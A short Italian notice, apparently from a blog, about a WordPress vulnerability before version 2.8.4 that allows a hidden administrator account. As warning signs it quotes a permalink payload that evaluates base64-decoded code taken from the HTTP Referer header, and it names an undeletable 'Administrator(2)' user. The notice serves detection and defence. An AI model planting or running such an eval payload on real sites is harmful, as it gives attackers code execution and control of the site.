Il bug di sicurezza in questione interessa tutte le versioni di WordPress antecedenti la 2.8.4 e permetterebbe di creare un amministratore nascosto.

- La presenza nei permalink di una stringa di codice tipo:
http://www.sito.com/2009/09/05/titolo-post/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/
o simili con al loro interno il termine eval e/o il termine base64_decode.

- La presenza di un utente amministratore tipo Administrator(2) che risulta impossibile cancellare.

Dettagli su Lorelle on WordPress e WordPress-it.it.